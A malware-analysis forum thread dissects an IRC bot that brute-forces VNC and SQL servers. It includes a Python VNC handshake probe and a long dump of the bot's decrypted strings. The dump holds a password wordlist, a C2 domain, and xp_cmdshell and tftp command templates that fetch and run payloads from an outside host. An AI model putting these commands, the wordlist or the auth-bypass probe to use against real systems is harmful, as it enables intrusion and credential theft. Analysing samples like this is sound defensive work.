A forum for reverse engineering, OS internals and malware analysis 

 #9168  by onthar
 Fri Oct 14, 2011 11:53 pm
Hi there!
I found this sample in the wild. http://www.virustotal.com/file-scan/rep ... 1318634828

It is an IRC-based bot that tries to brute-force VNCs.
There are some interesting strings in the dumped file that contain the wordlist for brute-forcing.
DDoS functions found too.

The virus injects into explorer.exe.

One problem: this sample is crypted with some VB6 crypter. It would be great if someone could explain how to unpack malware crypted with VB crypters :oops:

I've attached the sample and the dumped process.
Attachments (300.98 KiB), password: infected
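The VNC part of this bot comes down to the RFB handshake: read the server's "RFB 003.00x" banner, echo a version back (the "RFB %03d.%03d" string in the decrypted strings further down the thread), then look at which security types the server offers. Below is an added Python example, not code from the sample or from either poster, that walks that handshake against a scripted in-memory server and maps the outcome onto the three result tags the bot logs ([NoPassword], a password, [AuthBypass]). It assumes [AuthBypass] means what it usually does for this generation of bots: the server offers only VNC auth but still answers SecurityResult OK when the client picks security type None. That reading, the ScriptedRfbServer class, the probe_rfb function and the verdict names are mine, not the sample's. No password guessing is done here.

```python
import struct

RFB_INVALID, RFB_NONE, RFB_VNCAUTH = 0, 1, 2


class ScriptedRfbServer:
    """In-memory stand-in for a VNC server (constructed test input, not a
    real socket). It plays the server half of the RFB handshake in either
    the 3.3 style (server dictates one security type as a u32) or the
    3.7/3.8 style (server lists types, client picks one).
    accept_none=True models a server that advertises only VNC auth but
    still answers SecurityResult OK when the client picks None (the
    assumed meaning of the bot's [AuthBypass] tag)."""

    def __init__(self, major, minor, sec_types, accept_none=False):
        self.version = (major, minor)
        self.sec_types = list(sec_types)
        self.accept_none = accept_none
        self.out = b"RFB %03d.%03d\n" % (major, minor)   # ProtocolVersion banner
        self.stage = "version"

    def recv(self, n):
        data, self.out = self.out[:n], self.out[n:]
        return data

    def send(self, data):
        if self.stage == "version":
            if self.version < (3, 7):
                self.out += struct.pack(">I", self.sec_types[0])   # 3.3: one u32
                self.stage = "done"
            else:
                self.out += bytes([len(self.sec_types)]) + bytes(self.sec_types)
                self.stage = "security"
        elif self.stage == "security":
            chosen = data[0]
            if chosen == RFB_NONE:
                ok = RFB_NONE in self.sec_types or self.accept_none
                self.out += struct.pack(">I", 0 if ok else 1)   # SecurityResult
            elif chosen == RFB_VNCAUTH and chosen in self.sec_types:
                self.out += bytes(16)   # 16-byte DES challenge, never answered here
            self.stage = "done"


def probe_rfb(sock):
    """Client half of the handshake. Returns (verdict, 'major.minor'); the
    verdicts mirror the bot's result tags plus a few defensive extras."""
    banner = sock.recv(12)
    if len(banner) != 12 or not banner.startswith(b"RFB "):
        return "NotRfb", None
    major, minor = int(banner[4:7]), int(banner[8:11])
    ver = "%d.%d" % (major, minor)
    sock.send(b"RFB %03d.%03d\n" % (major, minor))   # echo the server's version
    if (major, minor) < (3, 7):
        sec = struct.unpack(">I", sock.recv(4))[0]
        if sec == RFB_NONE:
            return "NoPassword", ver
        if sec == RFB_VNCAUTH:
            return "VncAuth", ver      # a wordlist attempt would start here
        return "ConnFailed", ver
    count = sock.recv(1)[0]
    if count == 0:
        return "ConnFailed", ver       # server follows with a reason string
    offered = list(sock.recv(count))
    if RFB_NONE in offered:
        sock.send(bytes([RFB_NONE]))
        return "NoPassword", ver
    if RFB_VNCAUTH in offered:
        # Ask for None although it was not offered; a server that answers
        # SecurityResult OK anyway lets anyone in without a password.
        sock.send(bytes([RFB_NONE]))
        result = sock.recv(4)
        if len(result) == 4 and struct.unpack(">I", result)[0] == 0:
            return "AuthBypass", ver
        return "VncAuth", ver
    return "Unsupported", ver


if __name__ == "__main__":
    for srv in (ScriptedRfbServer(3, 8, [RFB_NONE]),
                ScriptedRfbServer(3, 8, [RFB_VNCAUTH]),
                ScriptedRfbServer(3, 8, [RFB_VNCAUTH], accept_none=True),
                ScriptedRfbServer(3, 3, [RFB_VNCAUTH])):
        print(probe_rfb(srv))
```

A real socket.socket can be passed to probe_rfb in place of ScriptedRfbServer, since only recv and send are used; on a live connection loop until the expected byte count has arrived, because recv may return short reads. Running the same probe against your own VNC hosts tells you which ones would show up as NoPassword or AuthBypass to a bot like this one.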
 #9169  by nullptr
 Sat Oct 15, 2011 2:13 am
onthar wrote: I found this sample in the wild. http://www.virustotal.com/file-scan/rep ... 1318634828
Internal name is Skonk-[ModBot]-Small-V0.4
Decrypted file VT report 35/43 - http://www.virustotal.com/file-scan/rep ... 1318643571
Decrypted strings:
qog
?patch
login
logout
ver
test
download
update
port
find
all
stop
stats
threads
procs
open
net
fukoff
die
reboot
nick
join
part
raw
http
tftp
rndnick
secure
unsecure
httpstop
logstop
ftfpstop
procsstop
securestop
reconnect
disconnect
quit
status
botid
aliases
log
clearlog
testdlls
opencmd
cmdstop
who
getclip
flusharp
flushdns
crash
killthreads
prefix
server
dns
killproc
killid
delete
get
list
mirc
rcmd
read
gethost
addalias
action
cycle
mode
repeat
delay
execute
rename
httpcon
upload
keylog
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
frexp
fmod
_hypot
_cabs
ldexp
modf
fabs
floor
ceil
tan
cos
sin
sqrt
atan2
atan
acos
asin
tanh
cosh
sinh
log10
log
pow
exp
GAIsProcessorFeaturePresent
KERNEL32
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
1#QNAN
1#INF
1#IND
1#SNAN
wsprintfA
USER32.dll
WS2_32.dll
VerQueryValueA
GetFileVersionInfoA
GetFileVersionInfoSizeA
VERSION.dll
Sleep
WriteFile
WaitForSingleObject
GetLastError
CreateEventA
ReadFile
CloseHandle
CreateFileA
CopyFileA
MultiByteToWideChar
WideCharToMultiByte
GetTickCount
DeleteFileA
CreateProcessA
OpenProcess
GetCurrentProcessId
SetFileAttributesA
GetFileAttributesA
GetModuleFileNameA
GetModuleHandleA
GetSystemDirectoryA
ExitProcess
CreateMutexA
MoveFileA
GetTempPathA
CreateThread
ExitThread
SetFilePointer
GetFileSize
GetLocalTime
FormatMessageA
GlobalUnlock
GlobalLock
UnmapViewOfFile
MapViewOfFile
CreateFileMappingA
SetFileTime
GetFileTime
ExpandEnvironmentStringsA
GetExitCodeProcess
PeekNamedPipe
DuplicateHandle
GetCurrentProcess
CreatePipe
GetComputerNameA
GetTimeFormatA
GetDateFormatA
FindClose
FileTimeToSystemTime
FileTimeToLocalFileTime
FindNextFileA
FindFirstFileA
TerminateProcess
GetLogicalDrives
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
QueryPerformanceCounter
QueryPerformanceFrequency
LoadLibraryA
GetProcAddress
lstrcpynA
lstrcmpA
lstrcpyA
lstrlenA
GetLocaleInfoA
GetVersionExA
GlobalMemoryStatus
TerminateThread
HeapFree
HeapAlloc
GetTimeZoneInformation
GetSystemTime
HeapReAlloc
RtlUnwind
GetStartupInfoA
GetCommandLineA
GetVersion
GetEnvironmentVariableA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
RaiseException
GetCPInfo
GetACP
GetOEMCP
LCMapStringA
LCMapStringW
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetStringTypeA
GetStringTypeW
SetStdHandle
FlushFileBuffers
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
SetEndOfFile
CompareStringA
CompareStringW
SetEnvironmentVariableA
KERNEL32.dll
(msql)
Trying: (%s:%d) user: (%s/%s).
ROOTED
IP: %s
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
staff
teacher
student
intranet
lan
main
winpass
blank
office
control
nokia
siemens
compaq
dell
cisco
ibm
oracle
orainstall
sqlpassoainstall
sql
databasepassword
data
databasepass
dbpassword
dbpass
access
database
domainpassword
domainpass
domain
hello
hell
god
sex
slut
bitch
fuck
exchange
backup
technical
loginpass
login
mary
katie
kate
george
eric
chris
ian
neil
lee
brian
susan
sue
sam
luke
john
mike
bill
fred
joe
jen
qwe
zxc
peter
bob
asd
qaz
win2000
winnt
winxp
win2k
win98
windows
oeminstall
oemuser
oem
user
homeuser
home
accounting
accounts
www
web
outlook
mail
qwerty
null
server
system
default
changeme
linux
unix
demo
none
guest
test
pwd
pass
pass1234
passwd
password
password1
adm
admins
administrat
administrateur
administrador
administrator
internet
admin
root
Gt8%S
kPxXf
dWN,
.vwp
Windows XP (SP0+SP1)
Windows NT4, 2000 (SP0-SP4)
O2Kp
xZG
\\%s\pipe\browser
\\%s\ipc$
sqlpass
satan
oainstall
%s %s %s User: (%s) Pass: (%s)
(no password)
%s\%s\%s
c$\windows\system32
c$\winnt\system32
Admin$\system32
%s\ipc$
1234qwer
asdfjkl
asdfg
abcdefg
Aaaaaa
1a2b3c
ABC123
a1b2c3d4
Student
testtest
test123
special
abcd1234
star
test1
temp
Password
Abcdef
aaaaaa
secret
1q2w3e
123abc
a1b2c3
School
Qwerty
Internet
newuser
newpass
abc123
utente
usuario
Inhaber
passe
Kennwort
senha
high
ftp
duck
master
owner
register
paper
money
cool
kool
kkk
bass
leet
vnc
cam
comp
computer
change
testing
sexy
pimp
help
monkey
abcdefgh
abcdef
abcde
abcd
abc
%systemroot%\system32\cmd.exe
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - [AuthBypass]
RFB %03d.%03d
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
sucksucksuck
Skonk-[ModBot]-Small-V0.4
xIB
LIB
iexplorer.exe
sysconfig.dat
Microsoft
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
Software\\Microsoft\\OLE
Software\\ASProtect
vnc.blazin-irc.info
weed
junglist
#vnc
junglist
#!INFO
.9-.1::.0[.12 120|MoD.0 ].1::.9-. 
.9-.1::.0[.12 ScAnAgE.0 ].1::.9-. 
.9-.1::.0[.12 RoOtAgE.0 ].1::.9-. 
NT LM 0.12
SMBs
pysmb
ADMIN$
IPC$
Continued
Continue
Paused
Pause
Stopped
Stop
Started
Start
Listed
List
Deleted
Delete
Added
Add
Ime A Fuck U Bot-And Ime Here To Fuck U Up
fbi.edu
%s Bot started
%s %d "%s"
Connected to %s
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
Executed pstore
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
%s Failed to start secure thread, error %d
%s %s System
Unsecuring
Securing
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[ICMP]: Invalid flood time must be greater than 0.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Flooding: (%s) for %s seconds.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
Normal
Spoofed
[TCP]: Invalid flood type specified.
random
ack
%s Uploading file: %s  to: %s failed
%s Uploading file: %s  to: %s
ftp.exe
open %s
put %s
bye
%s\%i%i%i.dll
%s File not found: %s
tcp
tcpflood
ping
pingflood
udp
udpflood
%s failed to start, no range specified
%s failed to start, syntax is invalid
%s already %d threads. too many specified
%s Failed to start, no range specified
%s Failed to start, syntax is invalid
%s Failed to start thread, error: %d
%s %s Method started at %s :%s for %d minutes %d delay %d threads
Sequential
Random
%s Already %d threads. Too many specified.
%s Failed to start, thread, error %d
%s  Started: %s:%d with delay: %d(ms)
%s Downloading URL: %s to: %s
icmp
icmpflood
%s Rename: '%s' to: '%s'
%s Couldn't execute file
%s ID must be different than current running process
%s Failed to start download thread, error %d
%s Downloading update from: %s
%s%s.exe
syn
synflood
ddos.random
ddos.ack
ddos.syn
Delay
%s Repeat not allowed in command line: %s
%s Repeat: %s
repeat
Mode change: %s
MODE %s
Cycle
Action: %s: %.
ACTION %s
Privmsg: %s: %s
%s Alias added: %s
%s Gethost: %s
%s Unable to extract Gethost command
%s Gethost: %s , Command: %s
%s %s %s :%s
%s Command unknown
%s No message specified
send
%s User list failed
%s User list completed
%s Share list failed
%s Share list completed
share
delete
continue
pause
stop
%s Service list failed
%s Service list complete.
start
%s Failed to load advapi32.dll or netapi32.dll
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger active.
[KEYLOG]: Already running.
[KEYLOG]: No key logger thread found.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
file
[PSNIFF]: No Carnivore thread found.
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
off
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
[PSNIFF]: Carnivore packet sniffer active.
[PSNIFF]: Already running.
psniff
%s Read file failed: %s
%s Read file complete: %s
%s Commands: %s
%s Error sending to remote shell
%s Command sent
%s Client not open
List: %s
%s Send File: %s, User: %s
%s Deleted '%s'
%s Failed to terminate process ID: %s
%s Process killed ID: %s
%s Failed to terminate process: %s
%s Process killed: %s
%s Couldn't resolve hostname
%s Lookup: %s -> %s
%s Server changed to: '%s'
%s Couldn't open file: %s
%s File opened: %s 
open
%s Prefix changed to: '%c'
%s Failed to kill thread: %s
%s Killed thread: %s
%s No active threads found
%s Stopped: %d thread(s)
all
IRC Raw: %s
Parted channel: '%s'.
PART %s
Joined channel: '%s'.
Nick changed to: '%s'.
%s Currently %d Threads
crash
%s Crashing bot
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s Already running
%s Failed to start server thread, error %d
%s Server listening on IP: %s:%d, Directory: %s\.
%s Failed to load dnsapi.dll
%s Failed to flush DNS cache
%s DNS cache flushed
%s Failed to flush ARP cache
%s ARP cache flushed
Get Clipboard
Login list complete
<Empty>
Remote shell
%s Remote shell ready
%s Couldn't open remote shell
%s Remote shell already running
%s Uptime: %s
%s Failed to start listing thread, error %d 
%s Proccess list
full
Already running
Removing Bot
System Info
Network Info
%s Failed to start listing thread, error %d
Listing log
Alias list
%s Failed to start list thread, error %d
List threads
sub
Failed to reboot system
Rebooting system
%s Bot ID: %s
%s Status: Ready. Bot Uptime: %s
QUIT :later
QUIT :%s
Disconnecting
QUIT :disconnecting
Reconnecting
QUIT :reconnecting
Scan
Secure
Process list
[TFTP]
tftpstop
[PING]
Ping flood
pingstop
[UPD]
UDP flood
udpstop
[SYN]
Syn flood
synstop
[DDoS]
DDoS flood
ddos.stop
Log list
[SOCKS4]
Server
socks4stop
socks4
pstore
%s Invalid login slot number: %d
%s No user logged in at slot: %d
%s User %s logged out.
%s Random nick change: %s
$chr(
$server
$rndnick
$chan
$user
User: %s logged in
My Master
%s *Failed host auth by: (%s!%s)
NOTICE %s :Host Auth failed (%s!%s).
%s *Failed pass auth by: (%s!%s)
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Id = '%s'
dump
%s Chat failed by unauthorized user: %s
%s Chat already active with user: %s
%s Failed to start chat thread, error %d
%s Chat from user: %s
CHAT
%s Receive file: '%s' failed from unauthorized user: %s.
%s Failed to start transfer thread, error %d
NOTICE %s :
PING %s
PING
NOTICE %s :
VERSION %s
VERSION
%s Receive file: '%s' from user: %s.
SEND
DCC
NOTICE
PRIVMSG
%s User: %s logged out
Joined channel: %s
QUIT
PART
NICK
NOTICE %s :%s
%s User %s logged out
KICK
NICK %s
JOIN %s %s
PONG %s
PING
%s Failed to send to Remote command shell
%s Failed to open remote command shell
%s Failed to open socket
Socket error
%s Transfer complete to IP: %s  Filename: %s (%s bytes)
%s Unable to open socket
Send timeout.
.DCC SEND %s %i %i %i.
%s File doesn't exist
%s Failed to bind to socket
%s Failed to create socket
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Socket error
%s Error opening socket
%s Error opening file for writing
%s Error unable to write file to disk
%d. %s = %s
AlIaS lIsT
[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s
[LOGS]: Cleared.
Cleared
%s List complete.
Begin
%s IP: %s Port: %d is open
IP: %s Port: %d
%s Bad URL, or DNS Error: %s
%s Update failed: Error executing file: %s
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Opened: %s 
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
%s CRC Failed (%d != %d)
%s Filesize is incorrect: (%d != %d).
%s Update: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s Error: %s <%d>.
mIRC
explorer.exe
SeShutdownPrivilege
%%comspec%% /c %s %s
@echo off
:repeat
del "%%1"
if exist "%%1" goto repeat
del "%s"
%sdel.bat
%s %s :%s
PRIVMSG %s :%s
Proccess has terminated.
Could not read data from proccess.
%s Failed to start IO thread, error  %d 
Remote Command Prompt
cmd.exe
%s %s: No service specified
%s Error with service: '%s'. %s
%s %s service: '%s'.
An unknown error occurred: <%ld>
The system is shutting down.
The service has not been started.
The requested control code cannot be sent to the service because the state of the service.
The service has been marked for deletion.
The service could not be logged on. The account does not have the correct access rights.
The specified service does not exist.
The service has been disabled.
The service depends on another service that has failed to start.
The service depends on a service that does not exist or has been marked for deletion.
The specified database does not exist.
An instance of the service is already running.
The requested control code is not valid, or it is unacceptable to the service.
The process for the service was started, but it did not call StartServiceCtrlDispatcher.
A thread could not be created for the service.
The database is locked.
The service cannot be stopped because other running services are dependent on it.
The service binary file could not be found.
The handle does not have the required access right.
The handle is invalid.
The requested control code is undefined.
The specified service name is invalid.
%s: %s (%s)
Stopped
Starting
Stoping
Running
Continuing
Pausing
Paused
Unknown
The following Windows services are registered:
%s %s: No share specified
%s %s share: '%s'.
%s %s: Error with share: '%s'. %s
%-14S %-24S %-6u %-4s
Yes
%s Share list error: %s <%ld>
Share name:    Resource:                Uses:  Desc:
%s %s: No username specified
%s %s: Error with username: '%s'. %s
%s %s username: '%s'
%s User info error: <%ld>
Units Per Week: %d
Max. Storage: %d
User's Language: %d
Country Code: %d
Workstations: %S
Logon Server: %S
Last Logoff: %d
Last Logon: %d
Number of Logins: %d
Bad Password Count: %d
Password Age: %d
Parameters: %S
Home Directory: %S
Auth Flags: %d
Privilege Level: %s
Guest
User
Administrator
Unknown
Comment: %S
User Comment: %S
Full Name: %S
Account: %S
Total users found: %d.
%s An access violation has occured
%s User list error: %s <%ld>
Username accounts for local system:
Network connection not found.
The user name could not be found.
Share not found.
The computer name is invalid.
An unknown error occurred.
The password is shorter than required (or does not meet the password policy requirement.)
The group already exists.
The user account already exists.
The operation is allowed only on the primary domain controller of the domain.
A general failure occurred in the network hardware.
Level parameter is invalid.
Device or directory does not exist.
Invalid for redirected resource.
Duplicate share name.
The name is invalid.
Access denied.
Not enough memory.
This network request is not supported.
Server name not found.
Invalid parameter.
%s %s <Server: %S> <Message: %S>
%s Message sent successfully
%s Not supported by this system
%s Unable to allocation ARP cache
%s Error getting ARP cache  %d 
%s ARP cache is empty
%s Error getting ARP cache %d
%d.%d.%d.%d
%s Error: server failed, returned  %d 
GET 
HTTP/1.0 200 OK
Server: myBot
Cache-Control: no-cache,no-store,max-age=0
pragma: no-cache
Content-Type: %s
Content-Length: %i
Accept-Ranges: bytes
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Connection: close
HTTP/1.0 200 OK
Server: myBot
Cache-Control: no-cache,no-store,max-age=0
pragma: no-cache
Content-Type: %s
Accept-Ranges: bytes
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Connection: close
HH:mm:ss
ddd, dd MMM yyyy
application/octet-stream
text/html
%s Failed to start worker thread, error  %d 
%s Worker thread of server thread: %d
Found: %i Files and %i Directories
<TD COLSPAN="3"><HR></TD>
</TABLE>
</BODY>
</HTML>
PRIVMSG %s :Found %s Files and %s Directories
%-31s  %-21s (%i bytes)
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE></A>
"><CODE>%.30s></CODE></A>
PRIVMSG %s :%-31s  %-21s (%s bytes)
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE></A>
"><CODE>%.29s>/</CODE></A>
<TD WIDTH="%d"><A HREF="
PRIVMSG %s :%-31s  %-21s
%2.2d/%2.2d/%4d  %2.2d:%2.2d %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD COLSPAN="3"><HR></TD>
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TABLE BORDER="0">
<HTML>
<HEAD>
<TITLE>Index of %s</TITLE>
</HEAD>
<BODY>
PRIVMSG %s :Searching for: %s
%s %s HTTP/1.1
Referer: %s
Host: %s
Connection: close
Invalid
Disk
Network
Cdrom
RAM
failed
%sKB
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): Failed to stat, device not ready.
SeDebugPrivilege
%s Process list failed
%s Process list completed
%s Listing processes:
%s Netapi32.dll couldn't be loaded
%s Network shares deleted
%s Failed to delete '%S' share.
%s Share '%S' deleted.
%s Failed to delete '%s' share.
%s Share '%s' deleted.
%s Advapi32.dll couldn't be loaded
%s Failed to open IPC$ Restriction registry key
%s Restricted access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
key
035zNWl4FZa/ds8Y7FIVrk/8J9c7I3H6CPODLbCm0EwyK8NQSJFmM8o5+O/1ae9qy44zZ5Mqe9d+2nKVSjvshgFHMoZ+D/UQ8MtBxK7MRmC+d4nEGQ8qSCMazQT4ER9sB8tpWMeqNKAllu+uOmKdfQoD/98deQ8goTTzlQMakTTY=
%s Failed to open DCOM registry key
%s DCOM disabled
%s Disable DCOM failed
EnableDCOM
%s Network shares added
%s Failed to add '%s' share.
%s Share '%s' added.
%s Failed to open IPC$ restriction registry key
%s Unrestricted access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
restrictanonymous
%s DCOM enabled
%s Enable DCOM failed
kthx
%s Transfer Complete On %s Executing ::(
File Not Found
%s Error: socket() failed, returned: %d
octet
ZHx
ZXx
YZqvgff
net-445
net-445
net-139
net-139
vnc-5900
vnc-5900
sym-2967
sym-2967
netbios
NetBios
ntpass
NTPass
sql-1433
sql-1433
net-445
vnc-5900
Total: %d in %s
tftp -i %s get %s &%s
%s Scan not active.
%s Current IP: %s
[FTP]: Failed to start server, error: <%d>.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
%s Failed to start server, error: <%d>.
%s Server started on Port: %d, File: %s, Request: %s.
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
%s Finished at %s:%d after %d minute(s) of scanning.
Failed to start worker thread, error: <%d>.
%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to initialize critical section.
[DDoS]: Done with flood (%iKB/sec).
[DDoS]: Send error: <%d>.
221 Goodbye happy r00ting.
425 Can't open data connection.
ROOTED
IP: %s (%s).
226 Transfer complete.
150 Opening BINARY mode data connection
RETR
200 PORT command successful.
%s.%s.%s.%s
PORT
226 Transfer complete
LIST
425 Passive not supported on this server
PASV
200 Type set to I.
200 Type set to A.
TYPE
257 "/" is current directory.
PWD
350 Restarting.
REST
215 StnyFtpd
SYST
230 User logged in.
PASS
331 Password required
USER
220 StnyFtpd 0wns j0
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Invalid target IP.
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[ESC]
[ESC]
[TAB]
[TAB]
[CTRL]
[CTRL]
[WIN]
[WIN]
[WIN]
[WIN]
[PRSC]
[PRSC]
[SCLK]
[SCLK]
[INS]
[INS]
[HOME]
[HOME]
[PGUP]
[PGUP]
[DEL]
[DEL]
[END]
[END]
[PGDN]
[PGDN]
[LEFT]
[LEFT]
[RGHT]
[RGHT]
[DOWN]
[DOWN]
[NMLK]
[NMLK]
[KEYLOG]: %s
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
SHChangeNotify
ShellExecuteA
shell32.dll
WNetCancelConnection2W
WNetCancelConnection2A
WNetAddConnection2W
WNetAddConnection2A
mpr.dll
DeleteIpNetEntry
GetIpNetTable
iphlpapi.dll
DnsFlushResolverCacheEntry_A
DnsFlushResolverCache
dnsapi.dll
NetMessageBufferSend
NetUserGetInfo
NetUserEnum
NetUserDel
NetUserAdd
NetRemoteTOD
NetApiBufferFree
NetScheduleJobAdd
NetShareEnum
NetShareDel
NetShareAdd
netapi32.dll
IcmpSendEcho
IcmpCloseHandle
IcmpCreateFile
icmp.dll
Mozilla/4.0 (compatible)
InternetCloseHandle
InternetReadFile
InternetCrackUrlA
InternetOpenUrlA
InternetOpenA
InternetConnectA
HttpSendRequestA
HttpOpenRequestA
InternetGetConnectedStateEx
InternetGetConnectedState
wininet.dll
closesocket
getpeername
gethostbyaddr
gethostbyname
gethostname
getsockname
setsockopt
accept
listen
select
bind
recvfrom
recv
sendto
ntohl
ntohs
htonl
htons
inet_addr
inet_ntoa
connect
ioctlsocket
socket
WSACleanup
WSAGetLastError
WSAIoctl
__WSAFDIsSet
WSAAsyncSelect
WSASocketA
WSAStartup
ws2_32.dll
DeleteObject
DeleteDC
BitBlt
SelectObject
GetDIBColorTable
GetDeviceCaps
CreateCompatibleDC
CreateDIBSection
CreateDCA
gdi32.dll
GetUserNameA
IsValidSecurityDescriptor
EnumServicesStatusA
CloseServiceHandle
DeleteService
ControlService
StartServiceA
OpenServiceA
OpenSCManagerA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegDeleteValueA
RegQueryValueExA
RegSetValueExA
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetForegroundWindow
GetWindowTextA
GetKeyState
GetAsyncKeyState
ExitWindowsEx
CloseClipboard
GetClipboardData
OpenClipboard
DestroyWindow
IsWindow
FindWindowA
SendMessageA
user32.dll
RegisterServiceProcess
QueryPerformanceFrequency
QueryPerformanceCounter
SearchPathA
GetDriveTypeA
GetLogicalDriveStringsA
GetDiskFreeSpaceExA
Module32First
Process32Next
Process32First
CreateToolhelp32Snapshot
SetErrorMode
kernel32.dll
[MAIN]: DLL test complete.
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s.bck
sfc_os.dll
TCPIP.SYS fixed, version %d.
%s\drivers\tcpip.sys
Patching tcpip.sys.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
https:/
http:/
:String
StringIndex
[pStore] %s %s:%s
kPStoreCreateInstance
pstorec.dll
const
letter
comp
country
funky
[%s|%s|%s|%s]-
%dd %dh %dm
UNK
essAu
tThru
tftp.exe -i  get 
WRQQj(j
QQUS
:.login
:!login
:.ident
:!ident
:.hashin
:!hashin
:.secure
:!secure
:.auth
:!auth
login 
auth 
HASH
.download 
download 
.update 
getcftp 
sending
JOIN #
NICK 
OPER 
oper 
now an IRC Operator
USER 
PASS 
paypal
PAYPAL
paypal.com
PAYPAL.COM
e-gold.com
e-gold.co.uk
Set-Cookie:
HTTP
FTP
IRC
BOT
[PSNIFF]: Error: recv() failed, returned: <%d>
[PSNIFF]: Suspicious %s packet from: %s:%d - %s.
[PSNIFF]
[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.
[PSNIFF]: Error: bind() failed, returned: <%d>.
[PSNIFF]: Error: socket() failed, returned: <%d>.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
